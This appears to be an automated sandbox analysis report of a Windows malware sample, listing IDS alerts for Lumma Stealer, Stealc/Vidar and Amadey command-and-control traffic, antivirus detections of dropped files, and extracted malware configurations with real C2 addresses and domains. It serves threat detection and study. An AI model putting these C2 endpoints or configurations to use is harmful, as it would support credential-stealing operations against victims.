2024-12-13T18:53:43.439391+0100	2057975	1	Domain Observed Used for C2 Detected	192.168.2.7	52701	1.1.1.1	53	UDP
2024-12-13T18:54:44.581773+0100	2057975	1	Domain Observed Used for C2 Detected	192.168.2.7	55746	1.1.1.1	53	UDP
2024-12-13T18:55:00.343394+0100	2057975	1	Domain Observed Used for C2 Detected	192.168.2.7	61261	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:53:42.750677+0100	2057979	1	Domain Observed Used for C2 Detected	192.168.2.7	62055	1.1.1.1	53	UDP
2024-12-13T18:54:44.143214+0100	2057979	1	Domain Observed Used for C2 Detected	192.168.2.7	53417	1.1.1.1	53	UDP
2024-12-13T18:54:59.912134+0100	2057979	1	Domain Observed Used for C2 Detected	192.168.2.7	60755	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fightlsoser .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:54:40.467751+0100	2058159	1	Domain Observed Used for C2 Detected	192.168.2.7	63259	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:53:42.966487+0100	2057977	1	Domain Observed Used for C2 Detected	192.168.2.7	58590	1.1.1.1	53	UDP
2024-12-13T18:54:44.285132+0100	2057977	1	Domain Observed Used for C2 Detected	192.168.2.7	51237	1.1.1.1	53	UDP
2024-12-13T18:55:00.062617+0100	2057977	1	Domain Observed Used for C2 Detected	192.168.2.7	57433	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:53:43.904931+0100	2057969	1	Domain Observed Used for C2 Detected	192.168.2.7	61907	1.1.1.1	53	UDP
2024-12-13T18:54:44.913358+0100	2057969	1	Domain Observed Used for C2 Detected	192.168.2.7	50303	1.1.1.1	53	UDP
2024-12-13T18:55:00.636229+0100	2057969	1	Domain Observed Used for C2 Detected	192.168.2.7	63849	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:53:43.666184+0100	2057971	1	Domain Observed Used for C2 Detected	192.168.2.7	52464	1.1.1.1	53	UDP
2024-12-13T18:54:44.733957+0100	2057971	1	Domain Observed Used for C2 Detected	192.168.2.7	62706	1.1.1.1	53	UDP
2024-12-13T18:55:00.489130+0100	2057971	1	Domain Observed Used for C2 Detected	192.168.2.7	59311	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:53:42.299357+0100	2057983	1	Domain Observed Used for C2 Detected	192.168.2.7	59797	1.1.1.1	53	UDP
2024-12-13T18:54:43.716512+0100	2057983	1	Domain Observed Used for C2 Detected	192.168.2.7	55070	1.1.1.1	53	UDP
2024-12-13T18:54:59.623533+0100	2057983	1	Domain Observed Used for C2 Detected	192.168.2.7	65511	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:53:42.522029+0100	2057981	1	Domain Observed Used for C2 Detected	192.168.2.7	49908	1.1.1.1	53	UDP
2024-12-13T18:54:43.989776+0100	2057981	1	Domain Observed Used for C2 Detected	192.168.2.7	53787	1.1.1.1	53	UDP
2024-12-13T18:54:59.768629+0100	2057981	1	Domain Observed Used for C2 Detected	192.168.2.7	57063	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:54:26.442670+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.7	50018	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:54:26.317127+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.7	50018	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:54:26.781270+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.7	50018	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:54:28.326862+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.7	50018	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:53:54.411840+0100	2044247	1	Malware Command and Control Activity Detected	116.203.10.31	443	192.168.2.7	49922	TCP
2024-12-13T18:54:26.925386+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.7	50018	TCP
2024-12-13T18:58:11.545656+0100	2044247	1	Malware Command and Control Activity Detected	116.203.10.31	443	192.168.2.7	50228	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:53:56.851290+0100	2051831	1	Malware Command and Control Activity Detected	116.203.10.31	443	192.168.2.7	49928	TCP
2024-12-13T18:58:13.854991+0100	2051831	1	Malware Command and Control Activity Detected	116.203.10.31	443	192.168.2.7	50230	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:53:56.850746+0100	2049087	1	A Network Trojan was detected	192.168.2.7	49928	116.203.10.31	443	TCP
2024-12-13T18:59:19.534710+0100	2049087	1	A Network Trojan was detected	192.168.2.7	50405	116.203.10.31	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:54:25.791250+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.7	50018	185.215.113.206	80	TCP
2024-12-13T18:55:28.094309+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.7	50134	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:53:18.000324+0100	2856147	1	A Network Trojan was detected	192.168.2.7	49835	185.215.113.43	80	TCP
2024-12-13T18:58:18.286943+0100	2856147	1	A Network Trojan was detected	192.168.2.7	50243	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Activity M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:54:25.176335+0100	2856148	1	A Network Trojan was detected	192.168.2.7	50011	89.35.131.209	80	TCP
2024-12-13T18:57:35.190388+0100	2856148	1	A Network Trojan was detected	192.168.2.7	50210	89.35.131.209	80	TCP
2024-12-13T19:00:40.001998+0100	2856148	1	A Network Trojan was detected	192.168.2.7	50446	89.35.131.209	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:53:27.032871+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.7	49841	TCP
2024-12-13T18:54:49.845869+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.7	50048	TCP
2024-12-13T18:58:01.292419+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.7	50218	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:53:22.516393+0100	2803305	3	Unknown Traffic	192.168.2.7	49847	45.11.183.55	80	TCP
2024-12-13T18:53:29.835099+0100	2803305	3	Unknown Traffic	192.168.2.7	49864	31.41.244.11	80	TCP
2024-12-13T18:53:37.158606+0100	2803305	3	Unknown Traffic	192.168.2.7	49877	31.41.244.11	80	TCP
2024-12-13T18:53:43.379907+0100	2803305	3	Unknown Traffic	192.168.2.7	49895	31.41.244.11	80	TCP
2024-12-13T18:53:52.164476+0100	2803305	3	Unknown Traffic	192.168.2.7	49917	31.41.244.11	80	TCP
2024-12-13T18:54:02.056661+0100	2803305	3	Unknown Traffic	192.168.2.7	49944	185.215.113.16	80	TCP
2024-12-13T18:54:09.395844+0100	2803305	3	Unknown Traffic	192.168.2.7	49977	185.215.113.16	80	TCP
2024-12-13T18:54:20.225636+0100	2803305	3	Unknown Traffic	192.168.2.7	50005	185.215.113.16	80	TCP
2024-12-13T18:54:28.087763+0100	2803305	3	Unknown Traffic	192.168.2.7	50025	45.155.249.199	80	TCP
2024-12-13T18:54:30.822572+0100	2803305	3	Unknown Traffic	192.168.2.7	50035	31.41.244.11	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:54:29.222706+0100	2803304	3	Unknown Traffic	192.168.2.7	50018	185.215.113.206	80	TCP
2024-12-13T18:54:59.411970+0100	2803304	3	Unknown Traffic	192.168.2.7	50059	185.215.113.206	80	TCP
2024-12-13T18:55:01.695826+0100	2803304	3	Unknown Traffic	192.168.2.7	50059	185.215.113.206	80	TCP
2024-12-13T18:55:03.242643+0100	2803304	3	Unknown Traffic	192.168.2.7	50059	185.215.113.206	80	TCP
2024-12-13T18:55:04.463596+0100	2803304	3	Unknown Traffic	192.168.2.7	50059	185.215.113.206	80	TCP
2024-12-13T18:55:08.096824+0100	2803304	3	Unknown Traffic	192.168.2.7	50059	185.215.113.206	80	TCP
2024-12-13T18:55:09.710054+0100	2803304	3	Unknown Traffic	192.168.2.7	50059	185.215.113.206	80	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T18:53:46.862358+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.7	49902	23.55.153.106	443	TCP
2024-12-13T18:54:47.483974+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.7	50046	23.55.153.106	443	TCP
2024-12-13T18:55:03.431532+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.7	50066	23.55.153.106	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: dare-curbys.biz	URL Reputation: Label: malware
Source: impend-differ.biz	URL Reputation: Label: malware
Source: covery-mover.biz	URL Reputation: Label: malware
Source: dwell-exclaim.biz	URL Reputation: Label: malware
Source: zinc-sneark.biz	URL Reputation: Label: malware
Source: formy-spill.biz	URL Reputation: Label: malware
Source: se-blurry.biz	URL Reputation: Label: malware
Source: print-vexer.biz	URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Avira: detection malicious, Label: HEUR/AGEN.1306956
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1306956
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1320706
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[2].exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[2].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Avira: detection malicious, Label: HEUR/AGEN.1320706

Found malware configuration

Source: 00000007.00000002.1349075912.0000000000361000.00000040.00000001.01000000.00000008.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: a629a70424.exe.2044.24.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["covery-mover.biz", "formy-spill.biz", "fightlsoser.click", "dwell-exclaim.biz", "se-blurry.biz", "dare-curbys.biz", "zinc-sneark.biz", "impend-differ.biz", "print-vexer.biz"], "Build id": "cMBsTw--Installs"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\1014885001\5eff75a611.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1014886001\994907c116.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\wwGF52ZwewEf8fwf9S3wwVeD\Y-Cleaner.exe	ReversingLabs: Detection: 75%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 60%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[3].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\BlueMail[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0040B006 CryptUnprotectData,LocalAlloc,LocalFree,	17_2_0040B006
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_00414B70 CryptBinaryToStringA,HeapAlloc,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,HeapFree,GetProcessHeap,HeapFree,	17_2_00414B70
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0080B26D CryptUnprotectData,LocalAlloc,LocalFree,	17_2_0080B26D
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_00814DD7 CryptBinaryToStringA,GetProcessHeap,CryptBinaryToStringA,GetLastError,GetProcessHeap,	17_2_00814DD7
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 18_2_00B113F0 CoResumeClassObjects,CryptContextAddRef,GetLastError,	18_2_00B113F0
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_004035B0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,	20_2_004035B0
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_04B33817 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,	20_2_04B33817

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Unpacked PE file: 17.2.c2bea0d661.exe.400000.0.unpack

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.7:49887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49886 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.10.31:443 -> 192.168.2.7:49896 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.7:49902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.35.43:443 -> 192.168.2.7:50041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.7:50046 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.7:50061 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.7:50066 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50092 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:50093 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.7:50106 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50114 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50113 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50116 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.7:50117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50121 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50149 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.7:50151 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.91:443 -> 192.168.2.7:50152 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50154 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50155 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50156 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.7:50157 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50176 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50175 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50177 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50178 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50179 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50180 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50181 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:50221 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.10.31:443 -> 192.168.2.7:50223 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50238 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50237 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50239 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50234 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50235 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50236 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50242 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50240 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50241 version: TLS 1.2

Source:	Binary string: C:\Users\Administrator\Desktop\Cryptor2\Workspace\940993430\Project\Release\Project.pdb source: a629a70424.exe, 00000018.00000002.2856948317.000000000035C000.00000002.00000001.01000000.00000012.sdmp, a629a70424.exe, 00000018.00000003.2766493477.00000000029F0000.00000004.00000800.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000000.2342375284.000000000035C000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: BlueMail.exe, 0000000E.00000002.2329718072.00000000060F0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: BlueMail.exe, BlueMail.exe, 0000000E.00000002.2329718072.00000000060F0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: BlueMail.exe, 0000000E.00000002.2328768604.0000000005E90000.00000004.08000000.00040000.00000000.sdmp, Gxtuum.exe, 00000016.00000002.2789644908.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Gxtuum.exe, 00000016.00000002.2789644908.0000000003C3C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: BlueMail.exe, 0000000E.00000002.2328768604.0000000005E90000.00000004.08000000.00040000.00000000.sdmp, Gxtuum.exe, 00000016.00000002.2789644908.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Gxtuum.exe, 00000016.00000002.2789644908.0000000003C3C000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 15_2_00B1D871 FindFirstFileExW,	15_2_00B1D871
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 15_2_00B1D922 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	15_2_00B1D922
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0040DE0C FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	17_2_0040DE0C
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_00401825 FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,	17_2_00401825
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0040CCF2 FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,FindNextFileA,FindClose,	17_2_0040CCF2
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0040B942 FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,DeleteFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,FindNextFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,	17_2_0040B942
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0040D820 FindFirstFileA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindNextFileA,FindClose,	17_2_0040D820
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_008192FC GetProcessHeap,FindFirstFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	17_2_008192FC
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0081AE0D SHGetFolderPathA,wsprintfA,FindFirstFileA,strcmp,strcmp,_mbscpy,_splitpath,_mbscpy,strlen,isupper,wsprintfA,_mbscpy,strlen,SHFileOperation,FindClose,	17_2_0081AE0D
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0081986A FindFirstFileA,StrCmpCA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	17_2_0081986A
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_00818952 FindFirstFileA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	17_2_00818952
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 18_2_00B1D871 FindFirstFileExW,	18_2_00B1D871
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 18_2_00B1D922 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	18_2_00B1D922
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_004176E7 FindFirstFileExW,	20_2_004176E7
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_10007EA9 FindFirstFileExW,	20_2_10007EA9
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_04B4794E FindFirstFileExW,	20_2_04B4794E

